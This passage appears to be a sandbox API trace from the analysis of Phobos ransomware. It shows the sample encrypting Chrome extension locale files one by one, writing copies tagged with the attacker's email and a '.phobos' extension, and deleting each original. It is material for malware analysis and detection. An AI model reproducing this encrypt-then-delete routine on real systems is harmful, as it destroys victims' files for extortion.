(in: hFile=0x130, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=256) returned 1 [0160.947] CloseHandle (hObject=0x130) returned 1 [0160.947] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json")) returned 0x2020 [0160.947] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0160.947] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.947] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.947] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.948] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32ce8) returned 1 [0160.948] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.948] ReadFile (in: hFile=0x130, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x100, lpOverlapped=0x0) returned 1 [0160.949] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110, dwBufLen=0x110 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x110) returned 1 [0160.949] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x110, lpOverlapped=0x0) returned 1 [0160.950] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa327e8) returned 1 [0160.950] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.950] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.950] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.950] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.950] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0160.950] CloseHandle (hObject=0x130) returned 1 [0160.950] CloseHandle (hObject=0x134) returned 1 [0160.950] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ko\\messages.json")) returned 1 [0160.951] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.987] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=253) returned 1 [0160.987] CloseHandle (hObject=0x134) returned 1 [0160.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json")) returned 0x2020 [0160.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.988] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.988] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.988] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.988] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.988] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xfd, lpOverlapped=0x0) returned 1 [0160.989] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100, dwBufLen=0x100 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x100) returned 1 [0160.989] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x100, lpOverlapped=0x0) returned 1 [0160.990] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.990] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.990] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.990] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.990] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.990] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.990] CloseHandle (hObject=0x134) returned 1 [0160.990] CloseHandle (hObject=0x17c) returned 1 [0160.990] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\lt\\messages.json")) returned 1 [0160.991] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.991] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=232) returned 1 [0160.991] CloseHandle (hObject=0x17c) returned 1 [0160.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json")) returned 0x2020 [0160.991] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.992] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.992] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.992] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.992] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.992] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xe8, lpOverlapped=0x0) returned 1 [0160.993] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0, dwBufLen=0xf0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xf0) returned 1 [0160.993] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf0, lpOverlapped=0x0) returned 1 [0160.994] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.994] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.994] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.994] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.994] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.994] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.994] CloseHandle (hObject=0x17c) returned 1 [0160.994] CloseHandle (hObject=0x134) returned 1 [0160.994] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\nl\\messages.json")) returned 1 [0160.995] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.995] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=210) returned 1 [0160.995] CloseHandle (hObject=0x134) returned 1 [0160.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json")) returned 0x2020 [0160.996] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0160.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0160.996] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.996] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0160.996] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.996] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa327e8) returned 1 [0160.996] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.996] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0xd2, lpOverlapped=0x0) returned 1 [0160.997] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0, dwBufLen=0xe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0xe0) returned 1 [0160.997] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xe0, lpOverlapped=0x0) returned 1 [0160.998] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32da8) returned 1 [0160.998] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0160.998] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0160.998] CryptDestroyKey (hKey=0xa32da8) returned 1 [0160.998] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0160.998] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.998] CloseHandle (hObject=0x134) returned 1 [0160.998] CloseHandle (hObject=0x17c) returned 1 [0160.998] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\no\\messages.json")) returned 1 [0160.999] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0160.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0160.999] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=264) returned 1 [0160.999] CloseHandle (hObject=0x17c) returned 1 [0160.999] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json")) returned 0x2020 [0161.000] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0161.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0161.000] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.000] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0161.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 